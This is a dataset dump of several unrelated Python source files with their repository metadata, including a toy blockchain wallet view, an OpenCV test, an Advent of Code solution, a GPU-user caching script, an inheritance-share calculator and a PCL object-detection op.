        print(balance, balance.json())
        b = sum([t['amount'] for t in balance.json() if t['address'] == myAddress])
        data = {"balance": b}
        return Response(data)
class mineView(APIView):
    def put(self, request):
        requests.put('http://127.0.0.1:16000/control/mineBlock', params=request.data)
class logsView(APIView):
    def get(self, request):
        completedTx = requests.get('http://127.0.0.1:16000/control/getAllBlocks', params=request.data)
        logs = []
        for blocks in completedTx.json():
            for txs in blocks['data']:
                if (len(txs['txOuts']) == 1):
                    if (txs['txOuts'][0]['address'] == myAddress):
                        logs.append(["received", txs['txOuts'][0]['amount'], txs['txOuts'][0]['address']])
                elif txs['txOuts'][0]['address'] == myAddress:
                    logs.append(["received", txs['txOuts'][0]['amount'], txs['txOuts'][1]['address']])
                elif txs['txOuts'][1]['address'] == myAddress:
                    logs.append(["sent", txs['txOuts'][0]['amount'], txs['txOuts'][0]['address']])
        data = {"logs": logs}
        print(data)
        return Response(data) | 40.173469 | 236 | 0.712217 | 491 | 3937 | 5.698574 | 0.197556 | 0.061115 | 0.046462 | 0.048606 | 0.473553 | 0.422445 | 0.399571 | 0.34203 | 0.327377 | 0.291994 | 0 | 0.029611 | 0.099314 | 3937 | 98 | 237 | 40.173469 | 0.759447 | 0 | 0 | 0.348315 | 0 | 0 | 0.216353 | 0.010665 | 0 | 0 | 0 | 0 | 0 | 1 | 0.078652 | false | 0 | 0.067416 | 0.011236 | 0.280899 | 0.089888 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5b62f118e2ffc9dd673f3068d8b01e2b12d22cc7 | 1,362 | py | Python | tests/test_template.py | furbrain/CVExplorer | 1283e3320ef7bb610b1044543614dd1b96740e52 | [
"MIT"
] | null | null | null | tests/test_template.py | furbrain/CVExplorer | 1283e3320ef7bb610b1044543614dd1b96740e52 | [
"MIT"
] | null | null | null | tests/test_template.py | furbrain/CVExplorer | 1283e3320ef7bb610b1044543614dd1b96740e52 | [
"MIT"
] | null | null | null | from unittest import TestCase
import os.path
import cv2
from lxml import html
from functions import ParameterTemplate
from functions.template import FunctionTemplate
FIXTURES_FILTER_HTML = "/usr/share/doc/opencv-doc/opencv4/html/d4/d86/group__imgproc__filter.html"
FIXTURES_FRAGMENT_HTML = os.path.join(os.path.dirname(__file__), "fixtures/filter_fragment.html")
class TestFunctionTemplate(TestCase):
    @classmethod
    def setUpClass(cls) -> None:
        from functions.paramtype import ParamType
        ParamType.initialise()
        with open(FIXTURES_FILTER_HTML) as f:
            cls.filter_text = f.read()
        with open(FIXTURES_FRAGMENT_HTML) as f:
            cls.filter_fragment = f.read()

    def setUp(self) -> None:
        self.html_frag = html.fromstring(self.filter_fragment)

    def test_create_function(self):
        self.func_template = FunctionTemplate(
            name="pyrDown",
            module="cv2",
            inputs=[
                ParameterTemplate("src", "InputArray")
            ],
            outputs=[
                ParameterTemplate("dst", "OutputArray")
            ],
            docs="FunctionTemplate docs"
        )
        function = self.func_template.create_function()
        self.assertEqual(cv2.pyrDown, function.func)
        self.assertListEqual(["dst"], [r.name for r in function.results])
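    # (Note added) FIXTURES_FILTER_HTML points at the Debian opencv-doc HTML
    # docs, so this suite assumes that package is installed on the machine.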
| 32.428571 | 98 | 0.65859 | 149 | 1,362 | 5.845638 | 0.449664 | 0.020666 | 0.041332 | 0.022962 | 0.036739 | 0 | 0 | 0 | 0 | 0 | 0 | 0.006796 | 0.243759 | 1,362 | 41 | 99 | 33.219512 | 0.838835 | 0 | 0 | 0.058824 | 0 | 0.029412 | 0.119765 | 0.074945 | 0 | 0 | 0 | 0 | 0.058824 | 1 | 0.088235 | false | 0 | 0.205882 | 0 | 0.323529 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5b6372f2718a1820477d44a40467e6e54ef84811 | 3,662 | py | Python | Eric/day3.py | efacks68/codingjuntos_advent2020 | 1d7ef6278616716ad62a5f3af3fa0419173b6dc1 | [
"MIT"
] | 1 | 2020-12-02T20:16:16.000Z | 2020-12-02T20:16:16.000Z | Eric/day3.py | efacks68/codingjuntos_advent2020 | 1d7ef6278616716ad62a5f3af3fa0419173b6dc1 | [
"MIT"
] | null | null | null | Eric/day3.py | efacks68/codingjuntos_advent2020 | 1d7ef6278616716ad62a5f3af3fa0419173b6dc1 | [
"MIT"
] | null | null | null | #Day3: Toboggan Trajectory
#Part1: Starting in Top-Left Corner, follow a slope of Right 3 and Down 1.
f = open("input_day3.txt")
lines = f.readlines()  # read in each line
f.close()
#print("lines\n",lines)

length = 0
mnt = []
for row in lines:
    mnt.append(str(row))  # move into new list for easier manipulation
    length = length + 1
    width = len(row)
#print("mnt\n",mnt)
print("L:", length, "W:", width)

trees0 = 0  # sum of trees hit
i = 0  # counter for 'x' direction
j = 0  # counter for 'y' direction
#print("length=",length)
#bc apparently you have to 'rotate' your input 90 degrees to the left (?)
#to make it look like the example (which wasn't clear!), add the j to count the rows down
#so that it can move correctly
count = 0
for row in mnt:
    # print("row:",j,"position:",i)
    # print(row[i])
    if row[i] == "#":
        trees0 = trees0 + 1
        # print("trees1:",trees1)
    i = i + 3
    j = j - 1
    count = count + 1
    # note: width here is len(row) including the trailing newline; the slope()
    # helper below wraps with width-1 instead, which is the safer modulus.
    if i >= width:
        # print("i:",i)
        rem = i % width
        # print("rem:",rem)
        i = rem
        # print(i)
    # if(count==50): break
print("Part1: num trees:", trees0)
#not 5 or 9 or 102 or 100

#Part2 - find the number of trees for each of the following slopes, then multiply them together
#R1,D1
#R3,D1 (already done)
#R5,D1
#R7,D1
#R1,D2
def slope(slp, R, D, W):
    i = 0
    j = 0
    trees = 0
    for row in slp:
        # print("row:",j,"position:",i)
        # print(row[i])
        if D == 1:
            if row[i] == "#":
                trees = trees + 1
                # print("trees:",trees)
            i = i + R
        else:
            if (j % D) == 0:
                if row[i] == "#":
                    trees = trees + 1
                    # print("trees:",trees)
                i = i + R
        j = j + 1
        if i >= (W - 1):
            # print("i:",i)
            rem = i % (W - 1)
            # print("rem:",rem)
            i = rem
            # print(i)
        # if(count==10): break
    print("Trees:", trees)
    return trees
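
# Quick self-check for slope() (not in the original file): the 11x11 example
# grid from the day-3 puzzle statement. A trailing newline is appended to each
# row so the width matches lines read with readlines() above; the puzzle
# states the right-3/down-1 slope hits 7 trees on this grid.
_sample = [s + "\n" for s in [
    "..##.......",
    "#...#...#..",
    ".#....#..#.",
    "..#.#...#.#",
    ".#...##..#.",
    "..#.##.....",
    ".#.#.#....#",
    ".#........#",
    "#.##...#...",
    "#...##....#",
    ".#..#...#.#",
]]
# slope(_sample, 3, 1, len(_sample[0]))  # expected to print "Trees: 7"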
trees1=slope(mnt,1,1,width)
trees2=slope(mnt,3,1,width)
trees3=slope(mnt,5,1,width)
trees4=slope(mnt,7,1,width)
trees5=slope(mnt,1,2,width)
def bulkcomment():
    """
print("Trees:",trees)
#slope2
i=0
j=0
count=0
trees2=0
for row in mnt:
# print("row:",j,"position:",i)
# print(row[i])
if(row[i]=="#"):
trees2=trees2+1
# print("trees2:",trees2)
i=i+5
j=j-1
# count=count+1
if(i>=31):
# print("i:",i)
rem=i%31
# print("rem:",rem)
i=rem
# print(i)
# if(count==10):break
print("Trees2:",trees2)
#slope3
i=0
j=0
count=0
trees3=0
for row in mnt:
# print("row:",j,"position:",i)
# print(row[i])
if(row[i]=="#"):
trees3=trees3+1
# print("trees3:",trees3)
i=i+7
j=j-1
# count=count+1
if(i>=31):
# print("i:",i)
rem=i%31
# print("rem:",rem)
i=rem
# print(i)
# if(count==10):break
print("Trees3:",trees3)
#slope4
i=0
j=0
count=0
trees4=0
for row in mnt:
print("row:",j,"position:",i)
print(row[i])
if((j%2)==0 and row[i]=="#"):
trees4=trees4+1
print("trees4:",trees4)
i=i+1
j=j-1
# count=count+1
if(i>=31):
print("i:",i)
rem=i%31
print("rem:",rem)
i=rem
print(i)
# if(count==10):break
print("Trees4:",trees4)
"""
print("Product:",trees1*trees2*trees3*trees4*trees5)
#Not:
#Trees1: 104
#Trees: 230
#Trees2: 83
#Trees3: 98
#Trees4: 104
#Product: 20234789120
#Not:
#Trees1: 104
#Trees: 230
#Trees2: 83
#Trees3: 98
#Trees4: 50
#Product: 9728264000
#later attempt: make a function out of it by sending the i and j changes
#function done!
| 19.902174 | 95 | 0.534134 | 582 | 3,662 | 3.359107 | 0.249141 | 0.022506 | 0.024552 | 0.023018 | 0.364194 | 0.352941 | 0.337596 | 0.337596 | 0.3289 | 0.299744 | 0 | 0.076012 | 0.28509 | 3,662 | 183 | 96 | 20.010929 | 0.670741 | 0.66876 | 0 | 0.254902 | 0 | 0 | 0.045022 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.039216 | false | 0 | 0 | 0 | 0.058824 | 0.078431 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5b65b745e1b964b05f2af0b1c1dc9c88bdbc1879 | 235 | py | Python | equipment_slots.py | BTmathic/game-template | 77765b1340e51828cc9216b4239f558c251859ce | [
"MIT"
] | 1 | 2019-09-01T20:15:52.000Z | 2019-09-01T20:15:52.000Z | equipment_slots.py | BTmathic/game-template | 77765b1340e51828cc9216b4239f558c251859ce | [
"MIT"
] | null | null | null | equipment_slots.py | BTmathic/game-template | 77765b1340e51828cc9216b4239f558c251859ce | [
"MIT"
] | null | null | null | from enum import auto, Enum
class EquipmentSlots(Enum):
    MAIN_HAND = auto()
    OFF_HAND = auto()
    HEAD = auto()
    BODY = auto()
    LEGS = auto()
    BOOTS = auto()
    L_RING = auto()
    R_RING = auto()
    CLOAK = auto()
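
# Usage sketch (illustrative, not in the original file): auto() numbers the
# members 1..9 in declaration order, so the slots can be iterated for a UI:
# for slot in EquipmentSlots:
#     print(slot.name, slot.value)   # MAIN_HAND 1, OFF_HAND 2, ...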
| 16.785714 | 27 | 0.561702 | 30 | 235 | 4.266667 | 0.566667 | 0.125 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.306383 | 235 | 13 | 28 | 18.076923 | 0.785276 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.090909 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5b6848b8710fcce4dc8ab6725a2afbe088dcdcab | 1,200 | py | Python | make_cache.py | jdh4/tigergpu_visualization | 770697124e6c8e04432db08002107dbd694e233b | [
"CNRI-Python"
] | null | null | null | make_cache.py | jdh4/tigergpu_visualization | 770697124e6c8e04432db08002107dbd694e233b | [
"CNRI-Python"
] | null | null | null | make_cache.py | jdh4/tigergpu_visualization | 770697124e6c8e04432db08002107dbd694e233b | [
"CNRI-Python"
] | 1 | 2020-05-26T15:13:15.000Z | 2020-05-26T15:13:15.000Z | #!/usr/licensed/anaconda3/2020.11/bin/python
base = "/home/jdh4/bin/gpus"

import sys
sys.path = list(filter(lambda p: p.startswith("/usr"), sys.path))
sys.path.append(base)

import json
import subprocess
import pandas as pd
from dossier import ldap_plus

# manual toggle: read the usage log (if 1) vs. enumerate all users via getent (else)
if 1:
    rows = []
    with open(base + "/utilization.json") as fp:
        for line in fp.readlines():
            x = json.loads(line)
            rows.append(list(x.values()))
    df = pd.DataFrame(rows)
    del rows
    df.columns = ['timestamp', 'host', 'index', 'username', 'usage', 'jobid']
    netids = list(df.username.drop_duplicates().values)
    if "root" in netids: netids.remove("root")
    if "OFFLINE" in netids: netids.remove("OFFLINE")
else:
    cmd = "getent passwd | cut -d: -f1 | sort | uniq"
    output = subprocess.run(cmd, capture_output=True, shell=True)
    netids = output.stdout.decode("utf-8").split('\n')
    netids.remove('')
    netids.remove('+')

univ_info = ldap_plus(sorted(netids))
df = pd.DataFrame(univ_info[1:], columns=univ_info[0])
cols = ['NETID', 'POSITION', 'DEPT', 'NAME', 'SPONSOR']
df = df[cols]
df = df[pd.notna(df.POSITION) | pd.notna(df.DEPT) | pd.notna(df.SPONSOR)]
df.to_csv(f"{base}/cached_users.csv", columns=cols, index=False)
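
# Illustrative round-trip check (not in the original script): the cache written
# above can be read back to confirm the expected schema.
# cached = pd.read_csv(f"{base}/cached_users.csv")
# assert list(cached.columns) == cols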
| 31.578947 | 75 | 0.675833 | 182 | 1,200 | 4.406593 | 0.527473 | 0.05985 | 0.033666 | 0.049875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012597 | 0.14 | 1,200 | 37 | 76 | 32.432432 | 0.764535 | 0.035833 | 0 | 0 | 0 | 0 | 0.17128 | 0.019896 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.03125 | 0.15625 | 0 | 0.15625 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5b68dabbc6ef27b5064c767d7bec2e0782be79bd | 4,777 | py | Python | test_of_inheritance_2.py | JRF-2018/simbd | 7a453562331cf5b41187a8c69e18ec3378004dc1 | [
"ClArtistic"
] | null | null | null | test_of_inheritance_2.py | JRF-2018/simbd | 7a453562331cf5b41187a8c69e18ec3378004dc1 | [
"ClArtistic"
] | 10 | 2021-09-05T13:15:50.000Z | 2022-02-10T06:48:46.000Z | test_of_inheritance_2.py | JRF-2018/simbd | 7a453562331cf5b41187a8c69e18ec3378004dc1 | [
"ClArtistic"
] | null | null | null | #!/usr/bin/python3
__version__ = '0.0.3' # Time-stamp: <2021-10-16T01:25:51Z>
## Language: Japanese/UTF-8
"""A test of inheritance."""
##
## License:
##
## Public Domain
## (Since this small code is close to be mathematically trivial.)
##
## Author:
##
## JRF
## http://jrf.cocolog-nifty.com/software/
## (The page is written in Japanese.)
##

from collections import OrderedDict
import argparse

ARGS = argparse.Namespace()

def parse_args():
    parser = argparse.ArgumentParser()
    parser.parse_args(namespace=ARGS)


## class 'Frozen' from:
## 《How to freeze Python classes « Python recipes « ActiveState Code》
## https://code.activestate.com/recipes/252158-how-to-freeze-python-classes/
def frozen(set):
    """Raise an error when trying to set an undeclared name, or when calling
    from a method other than Frozen.__init__ or the __init__ method of
    a class derived from Frozen"""
    def set_attr(self, name, value):
        import sys
        if hasattr(self, name):
            # If attribute already exists, simply set it
            set(self, name, value)
            return
        elif sys._getframe(1).f_code.co_name == '__init__':
            # Allow __setattr__ calls in __init__ calls of proper object types
            for k, v in sys._getframe(1).f_locals.items():
                if k == "self" and isinstance(v, self.__class__):
                    set(self, name, value)
                    return
        raise AttributeError("You cannot add an attribute '%s' to %s"
                             % (name, self))
    return set_attr

class Frozen(object):
    """Subclasses of Frozen are frozen, i.e. it is impossible to add
    new attributes to them and their instances."""
    __setattr__ = frozen(object.__setattr__)

    # Note: a nested __metaclass__ is a Python 2 idiom and has no effect under
    # the Python 3 shebang above; it is kept here for fidelity to the recipe.
    class __metaclass__(type):
        __setattr__ = frozen(type.__setattr__)
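
# Usage sketch (illustrative, not part of the original tests): a Frozen
# subclass accepts attributes created in __init__ but rejects new ones later.
# class _Demo(Frozen):
#     def __init__(self):
#         self.x = 1
# d = _Demo()
# d.x = 2   # fine: the attribute already exists
# d.y = 3   # raises AttributeError("You cannot add an attribute ...")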
class Serializable(Frozen):
    def __str__(self):
        r = []
        for p, v in self.__dict__.items():
            if isinstance(v, list):
                r.append(str(p) + ": [" + ', '.join(map(str, v)) + "]")
            else:
                r.append(str(p) + ": " + str(v))
        return '(' + ', '.join(r) + ')'


class Person(Serializable):
    def __init__(self):
        self.id = None    # ID or name
        self.death = None

class Death(Serializable):
    def __init__(self):
        self.term = None
        self.inheritance_share = None

class Economy(Frozen):
    def __init__(self):
        self.people = OrderedDict()

    def is_living(self, id):
        return id in self.people and self.people[id].death is None


def recalc_inheritance_share_1(economy, inherit_share, excluding):
    q = inherit_share
    r = {}
    if q is None:
        return r
    for x, y in q.items():
        if x not in excluding:
            if x in economy.people and economy.people[x].death is not None:
                excluding.add(x)
                q1 = recalc_inheritance_share_1(economy,
                                                economy.people[x].death
                                                .inheritance_share,
                                                excluding)
                for x1, y1 in q1.items():
                    if x1 not in r:
                        r[x1] = 0
                    r[x1] += y * y1
            else:
                if x not in r:
                    r[x] = 0
                r[x] += y
    return r

def recalc_inheritance_share(economy, person):
    p = person
    assert p.death is not None
    r = recalc_inheritance_share_1(economy,
                                   p.death.inheritance_share,
                                   set([person.id]))
    if r:
        s = sum(list(r.values()))
        for x, y in r.items():
            r[x] = y / s
        return r
    else:
        return None


def initialize1(economy):
    p0 = Person()
    p0.id = 'a'
    p0.death = Death()
    p0.death.inheritance_share = {
        'b': 0.7,
        'c': 0.3
    }
    p1 = Person()
    p1.id = 'b'
    p1.death = Death()
    p1.death.inheritance_share = {
        'a': 0.1,
        'c': 0.6,
        'd': 0.3
    }
    p2 = Person()
    p2.id = 'c'
    p3 = Person()
    p3.id = 'd'
    p3.death = Death()
    p3.death.inheritance_share = {
        'a': 0.1,
        'c': 0.6,
        'e': 0.3
    }
    p4 = Person()
    p4.id = 'e'
    economy.people = OrderedDict([(p.id, p) for p in [p0, p1, p2, p3, p4]])

def main():
    economy = Economy()
    initialize1(economy)
    p0 = economy.people['a']
    print(recalc_inheritance_share(economy, p0))
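
# With the sample population above (hedged, hand-computed): 'a' leaves shares
# {b: 0.7, c: 0.3}; b's and d's shares cascade to the living heirs c and e, so
# the printout should be roughly {'c': 0.93, 'e': 0.07} after renormalisation.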
if __name__ == '__main__':
    parse_args()
    main()
| 28.777108 | 78 | 0.515386 | 577 | 4,777 | 4.083189 | 0.305026 | 0.074703 | 0.046689 | 0.0191 | 0.12309 | 0.02292 | 0.02292 | 0.02292 | 0.02292 | 0 | 0 | 0.02683 | 0.368013 | 4,777 | 165 | 79 | 28.951515 | 0.752898 | 0.169772 | 0 | 0.142857 | 0 | 0 | 0.023905 | 0 | 0 | 0 | 0 | 0 | 0.008403 | 1 | 0.10084 | false | 0 | 0.02521 | 0.008403 | 0.260504 | 0.008403 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5b6b492e6ec14da57db531db52f34774d727d4cb | 8,345 | py | Python | detectron/ops/pcl.py | sisrfeng/NA-fWebSOD | 49cb75a9a0d557b05968c6b11b0f17a7043f2077 | [
"Apache-2.0"
] | 23 | 2020-03-30T11:48:33.000Z | 2022-03-11T06:34:31.000Z | detectron/ops/pcl.py | sisrfeng/NA-fWebSOD | 49cb75a9a0d557b05968c6b11b0f17a7043f2077 | [
"Apache-2.0"
] | 9 | 2020-09-28T07:15:16.000Z | 2022-03-25T08:11:06.000Z | detectron/ops/pcl.py | sisrfeng/NA-fWebSOD | 49cb75a9a0d557b05968c6b11b0f17a7043f2077 | [
"Apache-2.0"
] | 10 | 2020-03-30T11:48:34.000Z | 2021-06-02T06:12:36.000Z | import numpy as np
from sklearn.cluster import KMeans
from detectron.core.config import cfg
import detectron.utils.boxes as box_utils
try:
    xrange          # Python 2
except NameError:
    xrange = range  # Python 3
cfg_TRAIN_NUM_KMEANS_CLUSTER = 3
cfg_RNG_SEED = 3
cfg_TRAIN_GRAPH_IOU_THRESHOLD = 0.4
cfg_TRAIN_MAX_PC_NUM = 5
cfg_TRAIN_FG_THRESH = 0.5
cfg_TRAIN_BG_THRESH = 0.1
class PCLOp(object):
    def __init__(self):
        pass

    def forward(self, inputs, outputs):
        boxes = inputs[0].data
        cls_prob = inputs[1].data
        im_labels = inputs[2].data
        cls_prob_new = inputs[3].data
        im_cls_prob = inputs[4].data

        boxes = boxes[:, 1:]

        pcl_output = PCL(boxes, cls_prob, im_labels, cls_prob_new, im_cls_prob)

        outputs[0].reshape(pcl_output['labels'].shape)
        outputs[0].data[...] = pcl_output['labels']
        outputs[1].reshape(pcl_output['cls_loss_weights'].shape)
        outputs[1].data[...] = pcl_output['cls_loss_weights']
        outputs[2].reshape(pcl_output['gt_assignment'].shape)
        outputs[2].data[...] = pcl_output['gt_assignment']
        outputs[3].reshape(pcl_output['pc_labels'].shape)
        outputs[3].data[...] = pcl_output['pc_labels']
        outputs[4].reshape(pcl_output['pc_probs'].shape)
        outputs[4].data[...] = pcl_output['pc_probs']
        outputs[5].reshape(pcl_output['pc_count'].shape)
        outputs[5].data[...] = pcl_output['pc_count']
        outputs[6].reshape(pcl_output['img_cls_loss_weights'].shape)
        outputs[6].data[...] = pcl_output['img_cls_loss_weights']
        outputs[7].reshape(pcl_output['im_labels_real'].shape)
        outputs[7].data[...] = pcl_output['im_labels_real']
def PCL(boxes, cls_prob, im_labels, cls_prob_new, im_cls_prob):
    # cls_prob = cls_prob.data.cpu().numpy()
    # cls_prob_new = cls_prob_new.data.cpu().numpy()
    if cls_prob.shape[1] != im_labels.shape[1]:
        cls_prob = cls_prob[:, 1:]
        im_cls_prob = None
    eps = 1e-9
    cls_prob[cls_prob < eps] = eps
    cls_prob[cls_prob > 1 - eps] = 1 - eps
    cls_prob_new[cls_prob_new < eps] = eps
    cls_prob_new[cls_prob_new > 1 - eps] = 1 - eps

    proposals = _get_graph_centers(boxes.copy(), cls_prob.copy(),
                                   im_labels.copy(), im_cls_prob)

    labels, cls_loss_weights, gt_assignment, pc_labels, pc_probs, \
        pc_count, img_cls_loss_weights = _get_proposal_clusters(
            boxes.copy(), proposals, im_labels.copy(), cls_prob_new.copy())

    return {'labels': labels.reshape(1, -1).astype(np.float32).copy(),
            'cls_loss_weights': cls_loss_weights.reshape(1, -1).astype(np.float32).copy(),
            'gt_assignment': gt_assignment.reshape(1, -1).astype(np.float32).copy(),
            'pc_labels': pc_labels.reshape(1, -1).astype(np.float32).copy(),
            'pc_probs': pc_probs.reshape(1, -1).astype(np.float32).copy(),
            'pc_count': pc_count.reshape(1, -1).astype(np.float32).copy(),
            'img_cls_loss_weights': img_cls_loss_weights.reshape(1, -1).astype(np.float32).copy(),
            'im_labels_real': np.hstack((np.array([[1]]), im_labels)).astype(np.float32).copy()}
def _get_top_ranking_propoals(probs):
    """Get top ranking proposals by k-means"""
    kmeans = KMeans(n_clusters=cfg_TRAIN_NUM_KMEANS_CLUSTER,
                    random_state=cfg_RNG_SEED).fit(probs)
    high_score_label = np.argmax(kmeans.cluster_centers_)
    index = np.where(kmeans.labels_ == high_score_label)[0]
    if len(index) == 0:
        index = np.array([np.argmax(probs)])
    return index


def _build_graph(boxes, iou_threshold):
    """Build graph based on box IoU"""
    overlaps = box_utils.bbox_overlaps(
        boxes.astype(dtype=np.float32, copy=False),
        boxes.astype(dtype=np.float32, copy=False))
    return (overlaps > iou_threshold).astype(np.float32)
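
# Illustrative property (not in the original file): every box has IoU 1 with
# itself, so for any threshold below 1 the adjacency matrix has a unit diagonal.
# adj = _build_graph(np.array([[0, 0, 10, 10], [5, 5, 15, 15]], dtype=np.float32), 0.4)
# assert adj.shape == (2, 2) and adj[0, 0] == 1.0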
def _get_graph_centers(boxes, cls_prob, im_labels, im_cls_prob):
    """Get graph centers."""
    num_images, num_classes = im_labels.shape
    assert num_images == 1, 'batch size should be equal to 1'
    im_labels_tmp = im_labels[0, :].copy()
    gt_boxes = np.zeros((0, 4), dtype=np.float32)
    gt_classes = np.zeros((0, 1), dtype=np.int32)
    gt_scores = np.zeros((0, 1), dtype=np.float32)
    for i in xrange(num_classes):
        if im_labels_tmp[i] == 1:
            cls_prob_tmp = cls_prob[:, i].copy()
            idxs = np.where(cls_prob_tmp >= 0)[0]
            idxs_tmp = _get_top_ranking_propoals(cls_prob_tmp[idxs].reshape(-1, 1))
            idxs = idxs[idxs_tmp]
            boxes_tmp = boxes[idxs, :].copy()
            cls_prob_tmp = cls_prob_tmp[idxs]

            graph = _build_graph(boxes_tmp, cfg_TRAIN_GRAPH_IOU_THRESHOLD)

            keep_idxs = []
            gt_scores_tmp = []
            count = cls_prob_tmp.size
            while True:
                order = np.sum(graph, axis=1).argsort()[::-1]
                tmp = order[0]
                keep_idxs.append(tmp)
                inds = np.where(graph[tmp, :] > 0)[0]
                if im_cls_prob is None:
                    gt_scores_tmp.append(np.max(cls_prob_tmp[inds]))
                else:
                    gt_scores_tmp.append(im_cls_prob[0, i])
                graph[:, inds] = 0
                graph[inds, :] = 0
                count = count - len(inds)
                if count <= 5:
                    break

            gt_boxes_tmp = boxes_tmp[keep_idxs, :].copy()
            gt_scores_tmp = np.array(gt_scores_tmp).copy()

            keep_idxs_new = np.argsort(gt_scores_tmp)\
                [-1:(-1 - min(len(gt_scores_tmp), cfg_TRAIN_MAX_PC_NUM)):-1]

            gt_boxes = np.vstack((gt_boxes, gt_boxes_tmp[keep_idxs_new, :]))
            gt_scores = np.vstack((gt_scores,
                                   gt_scores_tmp[keep_idxs_new].reshape(-1, 1)))
            gt_classes = np.vstack((gt_classes,
                                    (i + 1) * np.ones((len(keep_idxs_new), 1), dtype=np.int32)))

            # If a proposal is chosen as a cluster center,
            # we simply delete that proposal from the candidate proposal pool,
            # because we found that the results of different strategies are similar and this strategy is more efficient
            cls_prob = np.delete(cls_prob.copy(), idxs[keep_idxs][keep_idxs_new], axis=0)
            boxes = np.delete(boxes.copy(), idxs[keep_idxs][keep_idxs_new], axis=0)

    proposals = {'gt_boxes': gt_boxes,
                 'gt_classes': gt_classes,
                 'gt_scores': gt_scores}
    return proposals
def _get_proposal_clusters(all_rois, proposals, im_labels, cls_prob):
    """Generate a random sample of RoIs comprising foreground and background
    examples.
    """
    num_images, num_classes = im_labels.shape
    assert num_images == 1, 'batch size should be equal to 1'
    # overlaps: (rois x gt_boxes)
    gt_boxes = proposals['gt_boxes']
    gt_labels = proposals['gt_classes']
    gt_scores = proposals['gt_scores']
    overlaps = box_utils.bbox_overlaps(
        all_rois.astype(dtype=np.float32, copy=False),
        gt_boxes.astype(dtype=np.float32, copy=False))
    gt_assignment = overlaps.argmax(axis=1)
    max_overlaps = overlaps.max(axis=1)
    labels = gt_labels[gt_assignment, 0]
    cls_loss_weights = gt_scores[gt_assignment, 0]

    # Select foreground RoIs as those with >= FG_THRESH overlap
    fg_inds = np.where(max_overlaps >= cfg_TRAIN_FG_THRESH)[0]

    # Select background RoIs as those with < FG_THRESH overlap
    bg_inds = np.where(max_overlaps < cfg_TRAIN_FG_THRESH)[0]

    ig_inds = np.where(max_overlaps < cfg_TRAIN_BG_THRESH)[0]
    cls_loss_weights[ig_inds] = 0.0

    labels[bg_inds] = 0
    gt_assignment[bg_inds] = -1

    img_cls_loss_weights = np.zeros(gt_boxes.shape[0], dtype=np.float32)
    pc_probs = np.zeros(gt_boxes.shape[0], dtype=np.float32)
    pc_labels = np.zeros(gt_boxes.shape[0], dtype=np.int32)
    pc_count = np.zeros(gt_boxes.shape[0], dtype=np.int32)

    for i in xrange(gt_boxes.shape[0]):
        po_index = np.where(gt_assignment == i)[0]
        img_cls_loss_weights[i] = np.sum(cls_loss_weights[po_index])
        pc_labels[i] = gt_labels[i, 0]
        pc_count[i] = len(po_index)
        pc_probs[i] = np.average(cls_prob[po_index, pc_labels[i]])

    return labels, cls_loss_weights, gt_assignment, pc_labels, pc_probs, pc_count, img_cls_loss_weights
| 38.279817 | 119 | 0.637987 | 1,225 | 8,345 | 4.043265 | 0.147755 | 0.062185 | 0.048052 | 0.027458 | 0.347668 | 0.255401 | 0.234403 | 0.174036 | 0.147789 | 0.121946 | 0 | 0.023873 | 0.231995 | 8,345 | 217 | 120 | 38.456221 | 0.748947 | 0.074895 | 0 | 0.038961 | 0 | 0 | 0.051569 | 0 | 0 | 0 | 0 | 0 | 0.012987 | 1 | 0.045455 | false | 0.006494 | 0.025974 | 0 | 0.11039 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5b6b52bea6e9b40479b6ac3698397020ea08e793 | 19,109 | py | Python | services/python-images/src/master/resources/distributions.py | hpi-epic/mpcsl | 05361acb0c8da68ddfa21f9fc9cd32a59255dc5c | [
"MIT"
] | 1 | 2021-11-21T13:52:36.000Z | 2021-11-21T13:52:36.000Z | services/python-images/src/master/resources/distributions.py | hpi-epic/mpcsl | 05361acb0c8da68ddfa21f9fc9cd32a59255dc5c | [
"MIT"
